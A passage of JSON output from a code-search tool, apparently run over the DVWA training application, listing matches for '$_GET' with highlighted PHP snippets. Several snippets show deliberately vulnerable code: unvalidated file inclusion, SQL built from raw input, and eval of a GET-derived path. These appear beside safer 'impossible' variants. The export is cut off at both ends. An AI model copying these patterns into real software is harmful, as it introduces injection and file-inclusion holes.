variable\">$file</span> <span class=\"token punctuation\">)</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"include.php\"</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> This isn't the page we want!\n<span class=\"line-number\">9:</span> \techo <span class=\"token string\">\"ERROR: File not found!\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 4,
"start": 1,
"end": 10,
"severity": "unknown",
"note": ""
},
{
"id": 201,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> The page we wish <span class=\"token keyword\">to</span> display\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">5:</span> \n<span class=\"line-number\">6:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Only allow include<span class=\"token punctuation\">.</span>php <span class=\"token operator\">or</span> file{<span class=\"token number\">1</span><span class=\"token punctuation\">.</span><span class=\"token punctuation\">.</span><span class=\"token number\">3</span>}<span class=\"token punctuation\">.</span>php\n<span class=\"line-number\">7:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"include.php\"</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file1.php\"</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file2.php\"</span> <span class=\"token operator\">&</span><span class=\"token operator\">&</span> <span class=\"token variable\">$file</span> !<span class=\"token operator\">=</span> <span class=\"token string\">\"file3.php\"</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">8:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> This isn't the page we want!\n<span class=\"line-number\">9:</span> \techo <span class=\"token string\">\"ERROR: File not found!\"</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 4,
"start": 1,
"end": 10,
"severity": "unknown",
"note": ""
},
{
"id": 203,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> The page we wish <span class=\"token keyword\">to</span> display\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">5:</span> \n<span class=\"line-number\">6:</span> <span class=\"token operator\">?</span><span class=\"token operator\">></span>\n<span class=\"line-number\">7:</span> ",
"line": 4,
"start": 1,
"end": 8,
"severity": "unknown",
"note": ""
},
{
"id": 204,
"file": "/home/chris/src/DVWA-master/vulnerabilities/fi/source/medium.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> The page we wish <span class=\"token keyword\">to</span> display\n<span class=\"highlight\"><span class=\"line-number\">4:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'page'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">5:</span> \n<span class=\"line-number\">6:</span> <span class=\"token operator\">/</span><span class=\"token operator\">/</span> Input validation\n<span class=\"line-number\">7:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"http://\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"https://\"</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">8:</span> <span class=\"token variable\">$file</span> <span class=\"token operator\">=</span> <span class=\"token function\">str_replace</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">\"../\"</span><span class=\"token punctuation\">,</span> <span class=\"token string\">\"..\\\"\" ), \"</span>\"<span class=\"token punctuation\">,</span> <span class=\"token variable\">$file</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> ",
"line": 4,
"start": 1,
"end": 10,
"severity": "unknown",
"note": ""
},
{
"id": 241,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 242,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_numeric</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> '<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>id<span class=\"token punctuation\">)</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 217,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 218,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/impossible.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check Anti<span class=\"token operator\">-</span>CSRF token\n<span class=\"line-number\">5:</span> \t<span class=\"token function\">checkToken</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_REQUEST</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'user_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_SESSION</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'session_token'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'index.php'</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">8:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">9:</span> \n<span class=\"line-number\">10:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Was a number entered<span class=\"token operator\">?</span>\n<span class=\"line-number\">11:</span> \t<span class=\"token function\">if</span><span class=\"token punctuation\">(</span><span class=\"token function\">is_numeric</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$id</span> <span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">12:</span> \t\t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check the database\n<span class=\"line-number\">13:</span> \t\t<span class=\"token variable\">$data</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$db</span><span class=\"token operator\">-</span><span class=\"token operator\">></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span> '<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">:</span>id<span class=\"token punctuation\">)</span> LIMIT <span class=\"token number\">1</span><span class=\"token comment\" spellcheck=\"true\">;' );</span>",
"line": 8,
"start": 3,
"end": 14,
"severity": "unknown",
"note": ""
},
{
"id": 222,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"highlight\"><span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {</span>\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$getid</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>",
"line": 3,
"start": 1,
"end": 9,
"severity": "unknown",
"note": ""
},
{
"id": 223,
"file": "/home/chris/src/DVWA-master/vulnerabilities/sqli_blind/source/low.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">1:</span> <span class=\"token operator\"><</span><span class=\"token operator\">?</span>php\n<span class=\"line-number\">2:</span> \n<span class=\"line-number\">3:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token function\">isset</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'Submit'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">4:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Get input\n<span class=\"highlight\"><span class=\"line-number\">5:</span> \t<span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">6:</span> \n<span class=\"line-number\">7:</span> \t<span class=\"token operator\">/</span><span class=\"token operator\">/</span> Check database\n<span class=\"line-number\">8:</span> \t<span class=\"token variable\">$getid</span> <span class=\"token operator\">=</span> \"<span class=\"token keyword\">SELECT</span> first_name<span class=\"token punctuation\">,</span> last_name FROM users WHERE user_id <span class=\"token operator\">=</span> <span class=\"token string\">'$id'</span><span class=\"token comment\" spellcheck=\"true\">;\";</span>\n<span class=\"line-number\">9:</span> \t<span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token function\">mysqli_query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$GLOBALS</span><span class=\"token punctuation\">[</span><span class=\"token string\">\"___mysqli_ston\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$getid</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">; // Removed 'or die' to suppress mysql errors</span>\n<span class=\"line-number\">10:</span> ",
"line": 5,
"start": 1,
"end": 11,
"severity": "unknown",
"note": ""
},
{
"id": 275,
"file": "/home/chris/src/DVWA-master/vulnerabilities/view_help.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Help'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> <span class=\"token variable\">$security</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">ob_start</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> <span class=\"token function\">eval</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'?>'</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">file_get_contents</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"vulnerabilities/{$id}/help/help.php\"</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'<?php '</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token variable\">$help</span> <span class=\"token operator\">=</span> <span class=\"token function\">ob_get_contents</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 276,
"file": "/home/chris/src/DVWA-master/vulnerabilities/view_help.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token operator\">=</span> <span class=\"token string\">'Help'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">12:</span> <span class=\"token variable\">$security</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> <span class=\"token function\">ob_start</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">15:</span> <span class=\"token function\">eval</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'?>'</span> <span class=\"token punctuation\">.</span> <span class=\"token function\">file_get_contents</span><span class=\"token punctuation\">(</span> DVWA_WEB_PAGE_TO_ROOT <span class=\"token punctuation\">.</span> <span class=\"token string\">\"vulnerabilities/{$id}/help/help.php\"</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">.</span> <span class=\"token string\">'<?php '</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">16:</span> <span class=\"token variable\">$help</span> <span class=\"token operator\">=</span> <span class=\"token function\">ob_get_contents</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">17:</span> <span class=\"token function\">ob_end_clean</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 12,
"start": 7,
"end": 18,
"severity": "unknown",
"note": ""
},
{
"id": 279,
"file": "/home/chris/src/DVWA-master/vulnerabilities/view_source.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">6:</span> <span class=\"token function\">dvwaPageStartup</span><span class=\"token punctuation\">(</span> <span class=\"token function\">array</span><span class=\"token punctuation\">(</span> <span class=\"token string\">'authenticated'</span><span class=\"token punctuation\">,</span> <span class=\"token string\">'phpids'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'Source'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"highlight\"><span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">12:</span> <span class=\"token variable\">$security</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$id</span> <span class=\"token operator\">==</span> <span class=\"token string\">'fi'</span> <span class=\"token punctuation\">)</span> {\n<span class=\"line-number\">16:</span> \t<span class=\"token variable\">$vuln</span> <span class=\"token operator\">=</span> <span class=\"token string\">'File Inclusion'</span><span class=\"token comment\" spellcheck=\"true\">;</span>",
"line": 11,
"start": 6,
"end": 17,
"severity": "unknown",
"note": ""
},
{
"id": 280,
"file": "/home/chris/src/DVWA-master/vulnerabilities/view_source.php",
"filetype": "php",
"search": "\\s\\$_GET",
"match": "<span class=\"line-number\">7:</span> \n<span class=\"line-number\">8:</span> <span class=\"token variable\">$page</span> <span class=\"token operator\">=</span> <span class=\"token function\">dvwaPageNewGrab</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">9:</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span> <span class=\"token punctuation\">.</span><span class=\"token operator\">=</span> <span class=\"token string\">'Source'</span> <span class=\"token punctuation\">.</span> <span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title_separator'</span> <span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span><span class=\"token variable\">$page</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'title'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"line-number\">10:</span> \n<span class=\"line-number\">11:</span> <span class=\"token variable\">$id</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'id'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span>\n<span class=\"highlight\"><span class=\"line-number\">12:</span> <span class=\"token variable\">$security</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_GET</span><span class=\"token punctuation\">[</span> <span class=\"token string\">'security'</span> <span class=\"token punctuation\">]</span><span class=\"token comment\" spellcheck=\"true\">;</span></span>\n<span class=\"line-number\">13:</span> \n<span class=\"line-number\">14:</span> \n<span class=\"line-number\">15:</span> <span class=\"token function\">if</span><span class=\"token punctuation\">(</span> <span class=\"token variable\">$id</span> <span class=\"token 